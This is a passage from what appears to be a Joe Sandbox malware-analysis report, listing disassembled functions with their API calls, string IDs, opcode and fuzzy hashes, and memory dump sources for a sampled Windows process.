                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter_noinfo
                                                      • String ID:
                                                      • API String ID: 3215553584-0
                                                      • Opcode ID: 5fe27b08ee4b6b8f0378e8def081a4c84f0191f5120a80ca269d4310bc11da16
                                                      • Instruction ID: ce2af2650a1664d2f31728a3109fa4838ba4dc7415b5c5d7c14e4fa46aafb830
                                                      • Opcode Fuzzy Hash: 5fe27b08ee4b6b8f0378e8def081a4c84f0191f5120a80ca269d4310bc11da16
                                                      • Instruction Fuzzy Hash: C2C1D22AE08A87B5FB607B15D0022BDEB91EF85B88FC44271D94D437D1DE7EE455A320
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: strrchr
                                                      • String ID: d
                                                      • API String ID: 3418686817-2564639436
                                                      • Opcode ID: d48147831702bd7bd43eec79edb916d25b6cc89b023425ac0650d085df72b790
                                                      • Instruction ID: dbd34f3db3d1e7492c3663ace13e1b944cd3a7a5717cc5bfbb7cff03a305faea
                                                      • Opcode Fuzzy Hash: d48147831702bd7bd43eec79edb916d25b6cc89b023425ac0650d085df72b790
                                                      • Instruction Fuzzy Hash: E391712A61CBC591EA60AB15E45236EE760F7C4BA0F504272DAED87BE8DF3DD440DB10
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: String$try_get_function
                                                      • String ID: LCMapStringEx
                                                      • API String ID: 1203122356-3893581201
                                                      • Opcode ID: fe23b64af8606f0a3c58e90187f372446aa5f227ab9bf59dc9e7446795e0f6b7
                                                      • Instruction ID: 1e54a895fd16118936024085076e2630df1b3a8e1e56ded5e22bdc04b7b51c9a
                                                      • Opcode Fuzzy Hash: fe23b64af8606f0a3c58e90187f372446aa5f227ab9bf59dc9e7446795e0f6b7
                                                      • Instruction Fuzzy Hash: 11115E75A08B8286EB60DB56F4812AAB7A0F7C9BC0F444136EECD83B58CF3CD5458B40
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: AddressCallerLibraryLoadProc
                                                      • String ID: SystemFunction036$advapi32.dll
                                                      • API String ID: 4215043672-1354007664
                                                      • Opcode ID: 30b2f73f96f1acc817fbc38871702d57f699fdefbd6e4a561c2ccd7f055b506f
                                                      • Instruction ID: 96ccaf6a01cf157fbf5e39ad3b929e68aff79ee0ea0dc8dde0e31020ed3e503a
                                                      • Opcode Fuzzy Hash: 30b2f73f96f1acc817fbc38871702d57f699fdefbd6e4a561c2ccd7f055b506f
                                                      • Instruction Fuzzy Hash: 80115229D5CA8BB1FB50BB10E847336E3A4FB80784FD041B5D54E422D4DF7DE454A621
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      APIs
                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,00007FF73AEEEDD3), ref: 00007FF73AEEF013
                                                      • LoadLibraryExA.KERNELBASE(?,?,?,?,?,?,00007FF73AEEEDD3), ref: 00007FF73AEEF034
                                                      • SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF73AEB17E7), ref: 00007FF73AEEF061
                                                        • Part of subcall function 00007FF73AEEEE80: GetLastError.KERNEL32 ref: 00007FF73AEEEE96
                                                        • Part of subcall function 00007FF73AEEEE80: FormatMessageA.KERNEL32 ref: 00007FF73AEEEECA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$FormatLibraryLoadMessage
                                                      • String ID: cannot load module '%s': %s
                                                      • API String ID: 3853237079-2554058836
                                                      • Opcode ID: df188ce702c3eb17da8a1c255447b51e67c1ee2f39d31328e8d2608fad6f4809
                                                      • Instruction ID: 50c6fb282de7eb7a7ae6f8e2666df2d7ec99b6ff63ed64ff67a2d93d9f877da0
                                                      • Opcode Fuzzy Hash: df188ce702c3eb17da8a1c255447b51e67c1ee2f39d31328e8d2608fad6f4809
                                                      • Instruction Fuzzy Hash: 3EF0197A918A8292EB20FB15F44222AB7B0FBC97D4F900175EA8D03A38CF3DD554CB14
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_initialize_crt__scrt_release_startup_lock
                                                      • String ID:
                                                      • API String ID: 1452418845-0
                                                      • Opcode ID: 8f06a7c1d25b1d9d4209a0557e7fbf7031a6169d9c2e25739453ee5eb69d5cde
                                                      • Instruction ID: 27e4c3f1b5979e6f88a0b3fd7c24b47f0e17a453b12738ab216ce1c8cd8b0f1c
                                                      • Opcode Fuzzy Hash: 8f06a7c1d25b1d9d4209a0557e7fbf7031a6169d9c2e25739453ee5eb69d5cde
                                                      • Instruction Fuzzy Hash: 49314B29E0D20376FB54FB6498233B9A2919F41384FC446B8E94E4B2D3DE2DF404A232
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$QueryVirtual
                                                      • String ID:
                                                      • API String ID: 3696288210-0
                                                      • Opcode ID: f4a39bd2c8b4e77c2adc7d5054eb46406d13928e6223299f2622db2b8216fcc4
                                                      • Instruction ID: 4d40d9f09b1e8722a67d8df26f0ccf100e82f8731baa8afda770fda1776b3805
                                                      • Opcode Fuzzy Hash: f4a39bd2c8b4e77c2adc7d5054eb46406d13928e6223299f2622db2b8216fcc4
                                                      • Instruction Fuzzy Hash: A021582665DE8191FA70BB15E442229E7F8FB98BD4F500275EA8D827F8DF3CD5409B10
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $
                                                      • API String ID: 0-227171996
                                                      • Opcode ID: 9843a88858d80629a5392dfe685009a7de1f426911982b70ac98bb5915318121
                                                      • Instruction ID: d5bd067277a0236e4242063ccb3a1c5b9e38533d78aac4219351f94fcad668c6
                                                      • Opcode Fuzzy Hash: 9843a88858d80629a5392dfe685009a7de1f426911982b70ac98bb5915318121
                                                      • Instruction Fuzzy Hash: 50021336618BC585DA70AB29D48122EB3A0F7C9BB4F504772EAAD877E5CF3DD4409B10
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast
                                                      • String ID: \
                                                      • API String ID: 1452528299-2967466578
                                                      • Opcode ID: dc7aa63d98f7a6b8676f16d7f75754d7e493f1b49019153a7c34ee2b34105215
                                                      • Instruction ID: f51fa255296b4c583f5fd3cd4037194275a5e1eb08ab24572c78733b109850af
                                                      • Opcode Fuzzy Hash: dc7aa63d98f7a6b8676f16d7f75754d7e493f1b49019153a7c34ee2b34105215
                                                      • Instruction Fuzzy Hash: 8E512136618B8696EA50EB1DE442229B7F0F788BA4F500275EBAD877A4CF3DD441DF10
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Similarity
                                                      • API ID: Process$CurrentExitTerminate
                                                      • String ID:
                                                      • API String ID: 1703294689-0
                                                      • Opcode ID: 5d4d62a54e9c46130ac50dd2ca8ebd46fd0b951107292fc29c74b2f9e1b698cf
                                                      • Instruction ID: da3eefcf22401bed6526ec215c6c640c1fe4199cbaf37b961d22d4ae52e78467
                                                      • Opcode Fuzzy Hash: 5d4d62a54e9c46130ac50dd2ca8ebd46fd0b951107292fc29c74b2f9e1b698cf
                                                      • Instruction Fuzzy Hash: D5E01A2CF4420B62FB147B61988627A6252AF85B42F8496B9C80E023A2CD3DF448A224
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Similarity
                                                      • API ID: ErrorLast$AllocVirtual
                                                      • String ID:
                                                      • API String ID: 1225938287-0
                                                      • Opcode ID: 0a31b1735084f54a03591de20996a30d0408d625ad59090563f2f3174e9d2cb5
                                                      • Instruction ID: a96a77b8ff19dc4ff0acbf4df722c0df5223fb0e2cc531522bc8a6921255c2c7
                                                      • Opcode Fuzzy Hash: 0a31b1735084f54a03591de20996a30d0408d625ad59090563f2f3174e9d2cb5
                                                      • Instruction Fuzzy Hash: 6CF03675519B8192E730BB14F44571AB7A0F7887F4F400364EA9D02BE8CF3CD1448B14
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Similarity
                                                      • API ID: ErrorLast$AllocVirtual
                                                      • String ID:
                                                      • API String ID: 1225938287-0
                                                      • Opcode ID: 6f5d66f4205355a488102a5330247b632e870741214089924bbcf7827210fdc4
                                                      • Instruction ID: 9769e2916235078e1bf0e2fb594b68eb30341ace260dad65d4ec2e6534c75529
                                                      • Opcode Fuzzy Hash: 6f5d66f4205355a488102a5330247b632e870741214089924bbcf7827210fdc4
                                                      • Instruction Fuzzy Hash: 96F01D76529B8196E720BB14E44571AB7A0FB887E4F400364EAED02BE8CF3CD2449B14
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Similarity
                                                      • API ID: strrchr
                                                      • String ID:
                                                      • API String ID: 3418686817-3916222277
                                                      • Opcode ID: 4e961bf43056450b91defcd618916dda4355ce4e6050535bdf05ac30be3a137a
                                                      • Instruction ID: 236c7ac36e215396b8cca1ae0c1eec89af6349155cb313b0e40c5edc045e96a1
                                                      • Opcode Fuzzy Hash: 4e961bf43056450b91defcd618916dda4355ce4e6050535bdf05ac30be3a137a
                                                      • Instruction Fuzzy Hash: 5C51CA3661968586E750DB19E08132AF7B0F7C9B94F505166FB9E87B68CF3DD4409F00
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Similarity
                                                      • API ID: Info
                                                      • String ID:
                                                      • API String ID: 1807457897-3916222277
                                                      • Opcode ID: d6049e12829b25a40106f2a2772facc37ef588d00b3e3406152c56e8e443654b
                                                      • Instruction ID: c9d57af774e0c6f7c90b39559145b361ffa27d9c8ac3b47e8795cca7bce6252f
                                                      • Opcode Fuzzy Hash: d6049e12829b25a40106f2a2772facc37ef588d00b3e3406152c56e8e443654b
                                                      • Instruction Fuzzy Hash: 4B51583291C2D296F760DF24D0457AEBBA0F748B48F944175EA8D4BA89CF7CD405DBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Similarity
                                                      • API ID: _wcsupr_s
                                                      • String ID: arg
                                                      • API String ID: 600324503-2022414218
                                                      • Opcode ID: 35be564464d6c4820efd0d8c7376e547ad19c939cfcdb2e341138f1cc7ef3ed0
                                                      • Instruction ID: e580d733499afefd4970bcf090fdb19dcebea5773c6e1d8d80b82472dc296934
                                                      • Opcode Fuzzy Hash: 35be564464d6c4820efd0d8c7376e547ad19c939cfcdb2e341138f1cc7ef3ed0
                                                      • Instruction Fuzzy Hash: B5314F3964864196E620FB29E44326AB3A0FBC9794F900671FA9D877B9DF3CD9019F10
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Similarity
                                                      • API ID: try_get_function
                                                      • String ID: AppPolicyGetProcessTerminationMethod
                                                      • API String ID: 2742660187-2031265017
                                                      • Opcode ID: 4833c0902515f3c114d76ba3d1c7fa11a93093573dd0661da56e0bda8c04332a
                                                      • Instruction ID: d6934a13ad7e3ba4c3c31fdf9a4c35956d4a486507dc87c1229c7d999385ecc6
                                                      • Opcode Fuzzy Hash: 4833c0902515f3c114d76ba3d1c7fa11a93093573dd0661da56e0bda8c04332a
                                                      • Instruction Fuzzy Hash: 18E04FDAE09607B1FF046791A8561B492119F18370EC843B1DA3D063E09E3CEADA9260
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                        • Part of subcall function 00007FF73AF463F0: GetOEMCP.KERNEL32(?,?,?,?,?,?,FFFFFFFD,00007FF73AF46714,?,?,?,?,00000000,COMSPEC,?,00007FF73AF469AE), ref: 00007FF73AF4641A
                                                      • IsValidCodePage.KERNEL32(?,00000001,?,?,00000000,00000001,?,00007FF73AF467C7,?,?,?,?,00000000,COMSPEC,?,00007FF73AF469AE), ref: 00007FF73AF46A43
                                                      • GetCPInfo.KERNEL32(?,00000001,?,?,00000000,00000001,?,00007FF73AF467C7,?,?,?,?,00000000,COMSPEC,?,00007FF73AF469AE), ref: 00007FF73AF46A8F
                                                      Similarity
                                                      • API ID: CodeInfoPageValid
                                                      • String ID:
                                                      • API String ID: 546120528-0
                                                      • Opcode ID: 8c69a90c0386b87ed3e1871073eaed1069123791459b7e64fa7c6bddaab46548
                                                      • Instruction ID: 9a7b59df6963fac867f12ae9f2a37fd1a599484739330f99e852f540f5cfdcd5
                                                      • Opcode Fuzzy Hash: 8c69a90c0386b87ed3e1871073eaed1069123791459b7e64fa7c6bddaab46548
                                                      • Instruction Fuzzy Hash: FB81F66AE0C69366F7A5BF25D842979F7A1EB40780FC440B6D68E47290DE3DE941F320
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Similarity
                                                      • API ID: _invalid_parameter_noinfo
                                                      • String ID:
                                                      • API String ID: 3215553584-0
                                                      • Opcode ID: 23f93f3439cf481d68ace413158a8b6a052188d27ba90543d8d527b73a2b783b
                                                      • Instruction ID: 7199a99743339901a56eaaa36e85ab242f497af94c8818dbf0e01c3fdf57defd
                                                      • Opcode Fuzzy Hash: 23f93f3439cf481d68ace413158a8b6a052188d27ba90543d8d527b73a2b783b
                                                      • Instruction Fuzzy Hash: 0D51E72DB0968B65F738BE26940267AE691FF44BA4F844370DD6C477D5CE3CE441A720
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • GetEnvironmentStringsW.KERNELBASE(?,?,?,?,?,?,00000001,00007FF73AF360FF,?,?,COMSPEC,00007FF73AF365F2), ref: 00007FF73AF46D39
                                                      • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,00000001,00007FF73AF360FF,?,?,COMSPEC,00007FF73AF365F2), ref: 00007FF73AF46DFD
                                                      Similarity
                                                      • API ID: EnvironmentStrings$Free
                                                      • String ID:
                                                      • API String ID: 3328510275-0
                                                      • Opcode ID: 3b739908b9269eaa44c28a8684affe23f73ea61920cba442614b266aa52dffe1
                                                      • Instruction ID: 54895f38e4e4a1fdb38bc1b0919706ff83066f9f613b749c40d51c1a0c98907f
                                                      • Opcode Fuzzy Hash: 3b739908b9269eaa44c28a8684affe23f73ea61920cba442614b266aa52dffe1
                                                      • Instruction Fuzzy Hash: 1821A535F08BA391F664AF16A441529E7A4BF44BD0F884274EE8D63BD8DF3CE4529314
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Similarity
                                                      • API ID: Initialize_invalid_parameter_noinfo_set_fmode
                                                      • String ID:
                                                      • API String ID: 3548387204-0
                                                      • Opcode ID: 62e22788655639b8fc294ace6df2bf72dda36c5940e2cb69f5321f03f315bef0
                                                      • Instruction ID: ac148861a5f08781d2f040b7ae80b0d7a44d7b1a3c74e3bb9bec24a5fbd7f805
                                                      • Opcode Fuzzy Hash: 62e22788655639b8fc294ace6df2bf72dda36c5940e2cb69f5321f03f315bef0
                                                      • Instruction Fuzzy Hash: 1B11641CE0820762FB68B7B548572BDC2814F91344FD00AB0E98D9A2C3EE1DF885A233
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • FindCloseChangeNotification.KERNELBASE(?,?,?,00007FF73AF3D50B,?,?,00000000,00007FF73AF3D5B3,?,?,?,?,?,?,00007FF73AF2AF6A), ref: 00007FF73AF3D63E
                                                      • GetLastError.KERNEL32(?,?,?,00007FF73AF3D50B,?,?,00000000,00007FF73AF3D5B3,?,?,?,?,?,?,00007FF73AF2AF6A), ref: 00007FF73AF3D648
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: ChangeCloseErrorFindLastNotification
                                                      • String ID:
                                                      • API String ID: 1687624791-0
                                                      • Opcode ID: 342de704302773eeb4f8a3e9181b51dc3d1ebcbc1097d58ab930e3d4315a225c
                                                      • Instruction ID: 3dd42e8f82318a65cfd41265b50a29ebf631b0f80f1e3779ebab27bd820a7f5a
                                                      • Opcode Fuzzy Hash: 342de704302773eeb4f8a3e9181b51dc3d1ebcbc1097d58ab930e3d4315a225c
                                                      • Instruction Fuzzy Hash: 6B11D369F0968362FF947736949327DD3825F407A4FC407B4DA3E472D2CE6DE444A221
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: FreeLibrary
                                                      • String ID:
                                                      • API String ID: 3664257935-0
                                                      • Opcode ID: a766f8a0e7bd2c8c12d36500e370b6cf717aaa638450d80a18f47b53e407cafa
                                                      • Instruction ID: 9dcbd581763b8f923e18211723e8aaefb42d7967fc571c6f11b79815be890e71
                                                      • Opcode Fuzzy Hash: a766f8a0e7bd2c8c12d36500e370b6cf717aaa638450d80a18f47b53e407cafa
                                                      • Instruction Fuzzy Hash: B2113C36948A46D2EA20BF04E496329B3B0F798798F904371E69E437E8CF3DD945DB10
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast
                                                      • String ID:
                                                      • API String ID: 1452528299-0
                                                      • Opcode ID: 130162f1e612a8c7bbf9229168b096cb58dc45a9e80bbc9874db3e364027be0a
                                                      • Instruction ID: 225b6d5ac48749436e989f8fe49f40bf60a1707517bcd2de96d9affeec2449f1
                                                      • Opcode Fuzzy Hash: 130162f1e612a8c7bbf9229168b096cb58dc45a9e80bbc9874db3e364027be0a
                                                      • Instruction Fuzzy Hash: 00710E36618B8586DB60EB1AE49136EB7B0F7C8B90F504175EA9D87B68DF3DD441CB00
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: strrchr
                                                      • String ID:
                                                      • API String ID: 3418686817-0
                                                      • Opcode ID: 46deeca88af4f2afcebb9a4e617de638de49ea4923ecd2725507a84c711ec80f
                                                      • Instruction ID: 0d2fac8dbd9cb487b31cc02fa98b712f07b5150abf85ad8d649159914b1698ed
                                                      • Opcode Fuzzy Hash: 46deeca88af4f2afcebb9a4e617de638de49ea4923ecd2725507a84c711ec80f
                                                      • Instruction Fuzzy Hash: E9B1193660CA818AD670EB19E48236AF7A4F7C9B94F404266EA9D83B59DF3DD541CF00
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: _free_nolock
                                                      • String ID:
                                                      • API String ID: 2882679554-0
                                                      • Opcode ID: b3af2ff0c18311ab22d1fc21a707ae1a8690425f7f867d5984d1b9b90b111ee8
                                                      • Instruction ID: 4bbdb512f5c19d72844c6b9d51cde0ba15fd37b12c76e43f64e8ed961afacbd9
                                                      • Opcode Fuzzy Hash: b3af2ff0c18311ab22d1fc21a707ae1a8690425f7f867d5984d1b9b90b111ee8
                                                      • Instruction Fuzzy Hash: CB51F07B658B4991EA20EB1AE49212EB7B1F7C8B94F500276EE8D47B64CF3CD451CB10
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter_noinfo
                                                      • String ID:
                                                      • API String ID: 3215553584-0
                                                      • Opcode ID: db93148fabc532a6c34eb6862733ff8622850cb7730be65101fd0d6c6195c713
